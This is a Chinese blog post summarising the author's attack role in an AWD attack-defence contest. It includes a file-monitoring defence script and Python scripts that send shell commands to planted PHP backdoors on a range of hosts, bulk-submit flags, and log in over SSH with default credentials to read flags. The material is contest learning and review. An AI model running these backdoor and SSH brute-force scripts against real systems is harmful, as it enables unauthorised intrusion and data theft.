<!DOCTYPE html>

<html lang="zh-CN">

<head>
  
  <title>第 六 周 AWD总结 - tothemoon &#39; s blog</title>
  <meta charset="UTF-8">
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
  
  

  <link rel="shortcut icon" href="https://gitee.com/tothemoon_2020/picgo/raw/master/img/20201005095528.jpeg" type="image/png" />
  <meta name="description" content="第六周 线下AWD总结">
<meta property="og:type" content="article">
<meta property="og:title" content="第 六 周 AWD总结">
<meta property="og:url" content="http://tothemoon2019.github.io/2020/11/06/%E7%AC%AC%20%E5%85%AD%20%E5%91%A8%20AWD%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="tothemoon &#39; s blog">
<meta property="og:description" content="第六周 线下AWD总结">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201104214821608.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106143418643.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106143317050.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144143290.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144211868.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144032999.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144452877.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106145019592.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106145137762.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201104221005086.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106150440075.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106180801855.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106204832598.png">
<meta property="og:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201107150740728.png">
<meta property="article:published_time" content="2020-11-06T13:45:32.000Z">
<meta property="article:modified_time" content="2020-11-08T01:37:28.489Z">
<meta property="article:author" content="tothemoon">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201104214821608.png">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/nexmoe/nexmoe.github.io@latest/css/style.css,npm/highlight.js@9.15.8/styles/atom-one-dark.css,gh/nexmoe/nexmoe.github.io@latest/lib/mdui_043tiny/css/mdui.css,gh/nexmoe/nexmoe.github.io@latest/lib/iconfont/iconfont.css" crossorigin>
  
  <!--<link rel="stylesheet" href="/css/style.css?v=1604750456269">-->

  
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <div class="nexmoe-bg" style="background-image: url(https://gitee.com/tothemoon_2020/picgo/raw/master/img-ba40e8db67f132e43f5473e1bf736787.jpg)"></div>
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="tothemoon" class="mdui-btn mdui-btn-icon"><img src="https://gitee.com/tothemoon_2020/picgo/raw/master/20201016111730.png" alt="tothemoon"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="tothemoon">
            <img src="https://gitee.com/tothemoon_2020/picgo/raw/master/20201016111730.png" alt="tothemoon" alt="tothemoon">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>6</div>
        <div><span>标签</span>0</div>
        <div><span>分类</span>3</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/archives" title="文章归档">
            <i class="mdui-list-item-icon nexmoefont icon-container"></i>
            <div class="mdui-list-item-content">
                文章归档
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        <form id="search_form" action_e="https://www.baidu.com/search?q=site:tothemoon2019.github.io" onsubmit="return search();">
            <label><input id="search_value" name="q" type="search" placeholder="搜索"></label>
        </form>
    </div>
</div>
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">社交按钮</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://space.bilibili.com/28841207" target="_blank" mdui-tooltip="{content: '哔哩哔哩'}" style="color: rgb(231, 106, 141);background-color: rgba(231, 106, 141, .15);">
            <i class="nexmoefont icon-bilibili"></i>
        </a><a class="mdui-ripple" href="https://github.com/tothemoon2019" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(0，0，0);background-color: rgba(25,23,23,.1);">
            <i class="nexmoefont icon-github"></i>
        </a><a class="mdui-ripple" href="https://steamcommunity.com/profiles/76561198234182404/" target="_blank" mdui-tooltip="{content: 'steam'}" style="color: rgb(25, 23, 23);background-color: rgba(14,71,161,.1);">
            <i class="nexmoefont icon-steam"></i>
        </a><a class="mdui-ripple" href="https://www.zhihu.com/people/beezhu-zou" target="_blank" mdui-tooltip="{content: '知乎'}" style="color: color:#1e88e5;background-color: rgba(0, 0, 255, .15);">
            <i class="nexmoefont icon-zhihu"></i>
        </a><a class="mdui-ripple" href="https://blog.csdn.net/qq_43478096" target="_blank" mdui-tooltip="{content: 'csdn'}" style="color: color:#1e88e5;background-color: rgba(0, 0, 255, .15);">
            <i class="nexmoefont https://csdnimg.cn/public/favicon.ico"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/AWD/">AWD</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/ctf/">ctf</a>
          <span class="category-list-count">4</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/杂项/">杂项</a>
          <span class="category-list-count">1</span>
        </li>

        
      </ul>

    </div>
  </div>


  
  
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">十一月 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">十月 2020</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 tothemoon
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
  
      <div class="nexmoe-post-cover" style="padding-bottom: 20%;"> 
          <img data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/20201106204956.png" data-sizes="auto" alt="第 六 周 AWD总结" class="lazyload">
          <h1>第 六 周 AWD总结</h1>
      </div>
  
  
  <div class="nexmoe-post-meta nexmoe-rainbow" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2020年11月06日</a>
    <a><i class="nexmoefont icon-areachart"></i>2.7k 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 14 分钟</a>
</div>

  <div class="nexmoe-post-right">
    
      <div class="nexmoe-fixed">
        <div class="nexmoe-valign">
            <div class="nexmoe-toc">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%AC%E5%85%AD%E5%91%A8-%E7%BA%BF%E4%B8%8BAWD%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">第六周 线下AWD总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%B7%A5%E5%85%B7"><span class="toc-number">1.1.</span> <span class="toc-text">1.工具</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#AoiAWD%EF%BC%88%E8%84%9A%E6%9C%AC%E5%B7%B2%E7%BC%96%E8%AF%91%E5%A5%BD%EF%BC%89"><span class="toc-number">1.1.1.</span> <span class="toc-text">AoiAWD（脚本已编译好）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#D%E7%9B%BE%EF%BC%8CSeay%EF%BC%8CXshell"><span class="toc-number">1.1.2.</span> <span class="toc-text">D盾，Seay，Xshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E6%89%B9%E9%87%8F%E8%87%AA%E5%8A%A8%E8%84%9A%E6%9C%AC"><span class="toc-number">1.1.3.</span> <span class="toc-text">一些批量自动脚本</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%9B%91%E6%8E%A7%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6"><span class="toc-number">1.1.3.1.</span> <span class="toc-text">监控本地文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%9F%E6%88%90ip%E5%88%97%E8%A1%A8%EF%BC%8C%E8%AF%BB%E5%8F%96flag"><span class="toc-number">1.1.3.2.</span> <span class="toc-text">生成ip列表，读取flag</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%B9%E9%87%8F%E8%BF%9E%E6%8E%A5ssh%EF%BC%88python2%EF%BC%8C%E5%8F%AF%E7%94%A8%E4%BA%8E%E7%88%86%E7%A0%B4%E5%BC%B1%E5%AF%86%E7%A0%81%EF%BC%89"><span class="toc-number">1.1.3.3.</span> <span class="toc-text">批量连接ssh（python2，可用于爆破弱密码）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="toc-number">1.2.</span> <span class="toc-text">2.注意事项</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#root%E6%9D%83%E9%99%90%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">1.2.1.</span> <span class="toc-text">root权限，数据库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA"><span class="toc-number">1.2.2.</span> <span class="toc-text">靶机</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%80%BB%E7%BB%93"><span class="toc-number">1.3.</span> <span class="toc-text">3.总结</span></a></li></ol></li></ol>
            </div>
        </div>
      </div>
    
  </div>

  <article>
    <h1 id="第六周-线下AWD总结"><a href="#第六周-线下AWD总结" class="headerlink" title="第六周 线下AWD总结"></a>第六周 线下AWD总结</h1><a id="more"></a>

<p>上周跟着工作室的大佬们去沈阳参加了第三届辽宁省网络安全技能大赛，非常幸运进了线下比赛。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201104214821608.png" alt="image-20201104214821608" class="lazyload"></p>
<p>线下比赛的赛制是AWD（网络攻防），以前一直打ctf，偶尔听学长说过，但重来没有了解过。这次真的是恶补了一下，基本上每天都是通宵，但也只是大概对比赛有了一个比较清晰的概念，一切都还得等到比赛时才知晓怎样。果然，不才，只拿了一个华为手表（老师们非常不满意这个成绩啊）。</p>
<p>所以想着写一下总结，记录一下，查漏补缺。供下次比赛复习用。</p>
<h2 id="1-工具"><a href="#1-工具" class="headerlink" title="1.工具"></a>1.工具</h2><p>首先是一些工具。脚本，waf，啥的。</p>
<p>这次比赛我负责的是攻击，另一位大佬负责防守，另外一些脚本在他手里，时间匆促，分完工后我也没去学过他那边的。</p>
<h3 id="AoiAWD（脚本已编译好）"><a href="#AoiAWD（脚本已编译好）" class="headerlink" title="AoiAWD（脚本已编译好）"></a>AoiAWD（脚本已编译好）</h3><p>上一届学长给了我一个安全响应系统<a target="_blank" rel="noopener" href="https://github.com/Thinkergod/AoiAWD">AoiAWD</a>，如果打比赛的时候部署上的话，防御应该非常简单了。可是这次用户给的权限实在太低了，连执行权限chmod +x 都没用。当时第一次部署时问师傅问的快没信心了，不过还是记录一下具体的使用方法，免的年久忘事。</p>
<p>首先启环境，先进入 AoiAWD/AoiAWD/ 里运行 aoiawd.phar </p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106143418643.png" alt="image-20201106143418643" class="lazyload"></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106143317050.png" alt="image-20201106143317050" class="lazyload"></p>
<p>运行成功后会回显token，端口号，然后本机访问 </p>
<p>输入token访问之</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144143290.png" alt="image-20201106144143290" class="lazyload"></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144211868.png" alt="image-20201106144211868" class="lazyload"></p>
<p>然后是网络配置，我是在虚拟机里搭建的环境，所以得配置端口映射才能靶机访问到。</p>
<p>这里有两个网卡：网络 nat+自定义。<code>自定义可以不用管</code>，但必须有一个nat模式。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144032999.png" alt="image-20201106144032999" class="lazyload"></p>
<p>进入虚拟网络配置器，更改设置，</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106144452877.png" alt="image-20201106144452877" class="lazyload"></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106145019592.png" alt="image-20201106145019592" class="lazyload"></p>
<p>此时就能在物理机上访问了。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106145137762.png" alt="image-20201106145137762" class="lazyload"></p>
<p>其次是这四个脚本探针（我已生成），每个探针对应不同的功能，放到比赛的靶机里网站根目录下用 <em>./</em>  执行。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201104221005086.png" alt="image-20201104221005086" class="lazyload"></p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106150440075.png" alt="image-20201106150440075" class="lazyload"></p>
<p>这里提示命令失败了可能是权限不够，用<code>chmod +x</code>赋予文件可执行权限（这次比赛连chmod+x都没给，也导致了当时没有搭上）。 </p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106180801855.png" alt="image-20201106180801855" class="lazyload"></p>
<p>启动（-s后面接容器网址）</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201106204832598.png" alt="image-20201106204832598" class="lazyload"></p>
<h3 id="D盾，Seay，Xshell"><a href="#D盾，Seay，Xshell" class="headerlink" title="D盾，Seay，Xshell"></a>D盾，Seay，Xshell</h3><p>xshll连接服务器</p>
<p>用于代码审计，先用D盾扫出比较明显的漏洞，然后用Seay审计。</p>
<p><img data-sizes="auto" data-src="https://gitee.com/tothemoon_2020/picgo/raw/master/image-20201107150740728.png" alt="image-20201107150740728" class="lazyload"></p>
<h3 id="一些批量自动脚本"><a href="#一些批量自动脚本" class="headerlink" title="一些批量自动脚本"></a>一些批量自动脚本</h3><h4 id="监控本地文件"><a href="#监控本地文件" class="headerlink" title="监控本地文件"></a>监控本地文件</h4><p>python(2) +文件名.py</p>
<pre><code class="python"># -*- coding: utf-8 -*-
# 文件监控

import os
import hashlib
import shutil
import ntpath
import time

CWD = os.getcwd()  # 返回当前进程工作目录
FILE_MD5_DICT = &#123;&#125;  # 文件MD5字典
ORIGIN_FILE_LIST = []

# 特殊文件路径字符串
Special_path_str = &#39;drops_A1F2GI&#39;
bakstring = &#39;bak_KO4DF8&#39;
logstring = &#39;log_JF239S&#39;
webshellstring = &#39;webshell_89DFG2&#39;
difffile = &#39;diff_UE23SN&#39;

Special_string = &#39;file_n0t_kill&#39;  # 免死金牌
UNICODE_ENCODING = &quot;utf-8&quot;
INVALID_UNICODE_CHAR_FORMAT = r&quot;\?%02x&quot;

# 文件路径字典
spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))
Special_path = &#123;
    &#39;bak&#39;: os.path.realpath(os.path.join(spec_base_path, bakstring)),
    &#39;log&#39;: os.path.realpath(os.path.join(spec_base_path, logstring)),
    &#39;webshell&#39;: os.path.realpath(os.path.join(spec_base_path, webshellstring)),
    &#39;difffile&#39;: os.path.realpath(os.path.join(spec_base_path, difffile)),
&#125;


def isListLike(value):
    return isinstance(value, (list, tuple, set))


# 获取Unicode编码
def getUnicode(value, encoding=None, noneToNull=False):
    if noneToNull and value is None:
        return None

    if isListLike(value):
        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
        return value

    if isinstance(value, unicode):
        return value
    elif isinstance(value, basestring):
        while True:
            try:
                return unicode(value, encoding or UNICODE_ENCODING)
            except UnicodeDecodeError, ex:
                try:
                    return unicode(value, UNICODE_ENCODING)
                except:
                    value = value[:ex.start] + &quot;&quot;.join(
                        INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
    else:
        try:
            return unicode(value)
        except UnicodeDecodeError:
            return unicode(str(value), errors=&quot;ignore&quot;)


# 目录创建
def mkdir_p(path):
    import errno
    try:
        os.makedirs(path)
    except OSError as exc:
        if exc.errno == errno.EEXIST and os.path.isdir(path):
            pass
        else:
            raise


# 获取当前所有文件路径
def getfilelist(cwd):
    filelist = []
    for root, subdirs, files in os.walk(cwd):   # 目录遍历器
        for filepath in files:
            originalfile = os.path.join(root, filepath)
            if Special_path_str not in originalfile:
                filelist.append(originalfile)
    return filelist


# 计算机文件MD5值
def calcMD5(filepath):
    try:
        with open(filepath, &#39;rb&#39;) as f:
            md5obj = hashlib.md5()
            md5obj.update(f.read())
            hash = md5obj.hexdigest()
            return hash
    except Exception, e:
        print u&#39;[!] getmd5_error : &#39; + getUnicode(filepath)
        print getUnicode(e)
        try:
            ORIGIN_FILE_LIST.remove(filepath)
            FILE_MD5_DICT.pop(filepath, None)
        except KeyError, e:
            pass


# 获取所有文件MD5
def getfilemd5dict(filelist=[]):
    filemd5dict = &#123;&#125;
    for ori_file in filelist:
        if Special_path_str not in ori_file:
            md5 = calcMD5(os.path.realpath(ori_file))
            if md5:
                filemd5dict[ori_file] = md5
    return filemd5dict


# 备份所有文件
def backup_file(filelist=[]):
    # if len(os.listdir(Special_path[&#39;bak&#39;])) == 0:
    for filepath in filelist:
        if Special_path_str not in filepath:
            shutil.copy2(filepath, Special_path[&#39;bak&#39;])


if __name__ == &#39;__main__&#39;:
    print u&#39;---------start------------&#39;
    for value in Special_path:
        mkdir_p(Special_path[value])
    # 获取所有文件路径，并获取所有文件的MD5，同时备份所有文件
    ORIGIN_FILE_LIST = getfilelist(CWD)
    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
    backup_file(ORIGIN_FILE_LIST)  # TODO 备份文件可能会产生重名BUG
    print u&#39;[*] pre work end!&#39;
    while True:
        file_list = getfilelist(CWD)
        # 移除新上传文件
        diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))   # 从file_list中去掉原有文件
        if len(diff_file_list) != 0:
            for filepath in diff_file_list:
                try:
                    f = open(filepath, &#39;r&#39;).read()
                except Exception, e:
                    break
                if Special_string in f:
                    ORIGIN_FILE_LIST = getfilelist(CWD)
                    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
                    backup_file(ORIGIN_FILE_LIST)  # TODO 备份文件可能会产生重名BUG
                    print u&#39;[*] Special_file had be change : &#39; + getUnicode(filepath)

                if Special_string not in f:
                    try:
                        print u&#39;[*] webshell find : &#39; + getUnicode(filepath)
                        shutil.move(filepath,
                                    os.path.join(Special_path[&#39;webshell&#39;], ntpath.basename(filepath) + &#39;.txt&#39;))
                    except Exception as e:
                        print u&#39;[!] move webshell error, &quot;%s&quot; maybe is webshell.&#39; % getUnicode(filepath)
                    try:
                        #　写入日志
                        f = open(os.path.join(Special_path[&#39;log&#39;], &#39;log.txt&#39;), &#39;a&#39;)
                        f.write(&#39;newfile: &#39; + getUnicode(filepath) + &#39; : &#39; + str(time.ctime()) + &#39;\n&#39;)
                        f.close()
                    except Exception as e:
                        print u&#39;[-] log error : file move error: &#39; + getUnicode(e)

        # 防止任意文件被修改,还原被修改文件
        md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
        for filekey in md5_dict:
            if md5_dict[filekey] != FILE_MD5_DICT[filekey]:
                try:
                    f = open(filekey, &#39;r&#39;).read()
                except Exception, e:
                    break
                if Special_string in f:
                    ORIGIN_FILE_LIST = getfilelist(CWD)
                    FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
                    backup_file(ORIGIN_FILE_LIST)  # TODO 备份文件可能会产生重名BUG
                    print u&#39;[*] Special_file had be change : &#39; + getUnicode(filekey)
                if Special_string not in f:
                    try:
                        print u&#39;[*] file had be change : &#39; + getUnicode(filekey)
                        shutil.move(filekey, os.path.join(Special_path[&#39;difffile&#39;], ntpath.basename(filekey) + &#39;.txt&#39;))
                        shutil.move(os.path.join(Special_path[&#39;bak&#39;], ntpath.basename(filekey)), filekey)
                    except Exception as e:
                        print u&#39;[!] move webshell error, &quot;%s&quot; maybe is webshell.&#39; % getUnicode(filekey)
                    try:
                        f = open(os.path.join(Special_path[&#39;log&#39;], &#39;log.txt&#39;), &#39;a&#39;)
                        f.write(&#39;diff_file: &#39; + getUnicode(filekey) + &#39; : &#39; + getUnicode(time.ctime()) + &#39;\n&#39;)
                        f.close()
                    except Exception as e:
                        print u&#39;[-] log error : done_diff: &#39; + getUnicode(filekey)
                        pass
        time.sleep(2)
</code></pre>
<h4 id="生成ip列表，读取flag"><a href="#生成ip列表，读取flag" class="headerlink" title="生成ip列表，读取flag"></a>生成ip列表，读取flag</h4><p>用于查找未知靶机</p>
<pre><code class="python"># -*- coding: utf-8 -*-
# 生成ip列表
import re

ip_input = &#39;49.234.62.198:8801-8812&#39;

try:
    num = str(re.findall(r&#39;[0-9]+-[0-9]+&#39;, ip_input)[0])
    f = open(&#39;ips_1.txt&#39;, &#39;w&#39;)
    for i in range(int(num.split(&#39;-&#39;)[0]), int(num.split(&#39;-&#39;)[1]) + 1):
        ip = str(ip_input).replace(num, str(i)) + &#39;\n&#39;
        print(ip, end=&#39;&#39;)
        f.write(ip)
    f.close()
except:
    print(&#39;Write Failed&#39;)
    exit()
</code></pre>
<p>用上面的ip列表连接已知后门进行读取flag</p>
<pre><code class="python"># -*- coding: utf-8 -*-

import requests
import time

way = &#39;/footer.php&#39;
data = &#123;&#39;shell&#39;: &quot;cat /flag&quot;&#125;

flag_file = &#39;flag_1.txt&#39; # 将结果写入flag_1.txt
ips_file = &#39;ips_1.txt&#39;  # 读取的IP列表
res = []


def exp_post(file, way):
    try:
        count = 0
        success = 0
        f = open(file)
        line = f.readline().splitlines()
    except:
        print(file + &#39; Read Failed&#39;)

    while line:
        url = &#39;http://&#39; + line[0] + way
        try:
            req = requests.post(url=url, data=data, timeout=3)
            flag = str(req.text.encode(&#39;raw_unicode_escape&#39;))
            print(&#123;&#39;ip&#39;: line, &#39;flag&#39;: flag&#125;)
            res.append(&#123;&#39;ip&#39;: line, &#39;flag&#39;: flag&#125;)
            line = f.readline().splitlines()
            count += 1
            success += 1
        except:
            res.append(&#123;&#39;ip&#39;: line, &#39;flag&#39;: None&#125;)
            print(&#123;&#39;ip&#39;: line, &#39;flag&#39;: None&#125;)
            line = f.readline().splitlines()
            count += 1
            continue

    print(&#39;Total: &#39; + str(count) + &#39;\tSuccessed: &#39; + str(success) + &#39;\tFailed: &#39; + str(count-success))


def write_flags():
    try:
        f = open(flag_file, &#39;w&#39;)
        for i in res:
            f.write(str(i) + &#39;\n&#39;)
        f.close()
    except:
        print(&#39;Flag Write Failed&#39;)


if __name__ == &#39;__main__&#39;:
    while True:
        print(&#39;*&#39; * 30)
        print(time.asctime(time.localtime(time.time())))
        exp_post(ips_file, way)
        write_flags()
        time.sleep(60 * 2)

</code></pre>
<p>和上个脚本类似，payload更多。</p>
<pre><code class="python"># -*- coding: utf-8 -*-
# 

import requests
import time
import re

ips_file = &#39;ips_1.txt&#39;  # 读取的IP列表
way = &#39;/config.php&#39;        # 后门路径
payloads = [            # 后门密码和路径
    &#123;&quot;c&quot;: &quot;exec(&#39;cat /flag&#39;,$out);print_r($out);die();&quot;&#125;,
    &#123;&quot;c&quot;: &quot;system(&#39;cat /flag&#39;,$out);print_r($out);die();&quot;&#125;,
    &#123;&quot;c&quot;: &quot;passthru(&#39;cat /flag&#39;,$out);print_r($out);die();&quot;&#125;,
    &#123;&quot;c&quot;: &quot;shell_exec(&#39;cat /flag&#39;,$out);print_r($out);die();&quot;&#125;,
]
flag_file = &#39;flag_1.txt&#39;
res = []        # 返回成功结果


def exp_post(file, way):
    try:
        count = 0
        success = 0
        f = open(file)
        line = f.readline().splitlines()
    except:
        print(file + &#39; Read Failed&#39;)

    while line:
        url = &#39;http://&#39; + line[0] + way
        try:
            for payload in payloads:
                req = requests.post(url=url, data=payload, timeout=3)
                flag = str(re.findall(r&#39;\[0\] \=\&gt; .+\\n&#39;, str(req.text.encode(&#39;raw_unicode_escape&#39;)))[0])[7:-5]
                # flag = str(req.text.encode(&#39;raw_unicode_escape&#39;))
                print(&#123;&#39;ip&#39;: line, &#39;flag&#39;: flag&#125;)
                res.append(&#123;&#39;ip&#39;: line, &#39;flag&#39;: flag&#125;)
                line = f.readline().splitlines()
                count += 1
                success += 1
                break
        except:
            res.append(&#123;&#39;ip&#39;: line, &#39;flag&#39;: None&#125;)
            print(&#123;&#39;ip&#39;: line, &#39;flag&#39;: None&#125;)
            line = f.readline().splitlines()
            count += 1
            continue


def write_flags():
    try:
        f = open(flag_file, &#39;w&#39;)
        for i in res:
            f.write(str(i) + &#39;\n&#39;)
        f.close()
    except:
        print(&#39;Flag Write Failed&#39;)


if __name__ == &#39;__main__&#39;:
    while True:
        print(&#39;*&#39; * 30)
        print(time.asctime(time.localtime(time.time())))
        exp_post(ips_file, way)
        write_flags()
        time.sleep(60 * 2)

</code></pre>
<p>批量提交flag</p>
<pre><code class="python"># -*- coding: utf-8 -*-
import requests
import re

url = &quot;https://172.20.1.1/Common/awd_sub_answer&quot;
flags_file = &#39;flag_1.txt&#39;
key_word = &#39;&#39;


def read_flags():
    # 读取Flag
    try:
        with open(flags_file, &#39;r&#39;) as f:
            lines = f.read().splitlines()
        f.close()
        return lines
    except:
        print(&#39;Flag Read Failed&#39;)
        exit()


def post_data(flags):
    # 提交flag
    success = 0
    for i in flags:
        data = &#123;&#39;ip&#39;: eval(i)[&#39;ip&#39;], &#39;flag&#39;: eval(i)[&#39;flag&#39;]&#125;

        try:
            req = requests.post(url=url, data=data, timeout=3)
            status = req.status_code
            re.findall(key_word, req.text)
            success += 1
            print(&#39;Submit Successed &#39;, data[&#39;ip&#39;])
        except :
            print(&#39;Failed IP : &#39;, data[&#39;ip&#39;])
            continue

    print(&#39;Total: &#39; + str(len(flags)) + &#39;\tSuccessed: &#39; + str(success) + &#39;\tFailed: &#39; + str(len(flags)-success))


if __name__ == &#39;__main__&#39;:
    flags = read_flags()
    post_data(flags)
</code></pre>
<h4 id="批量连接ssh（python2，可用于爆破弱密码）"><a href="#批量连接ssh（python2，可用于爆破弱密码）" class="headerlink" title="批量连接ssh（python2，可用于爆破弱密码）"></a>批量连接ssh（python2，可用于爆破弱密码）</h4><pre><code class="python">import paramiko
for i in range(1,10):
    ip = &#39;172.16.10&#39;+str(i)+&#39;.200&#39; # ip地址
    port = &#39;22&#39; # 端口
    username = &#39;ubuntu&#39; # 用户名
    passwd = &#39;venus&#39; # 密码

    print(ip)
    # ssh 用户名 密码 登陆
    def ssh_base_pwd(ip, port, username, passwd, cmd=&#39;cat flag&#39;): # 命令
        port = int(port)
        ssh = paramiko.SSHClient()

        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        ssh.connect(hostname=ip, port=port, username=username, password=passwd)

        stdin, stdout, stderr = ssh.exec_command(cmd)

        result = stdout.read()
        if not result:
            print(&quot;无结果!&quot;)
            result = stderr.read()
        ssh.close()

        return result.decode()

    try:
        a = ssh_base_pwd(ip, port, username, passwd)
        print(a)
    except:
        pass</code></pre>
<p>批量连接flag</p>
<p>比如连接ssh，获取flag，提交flag等</p>
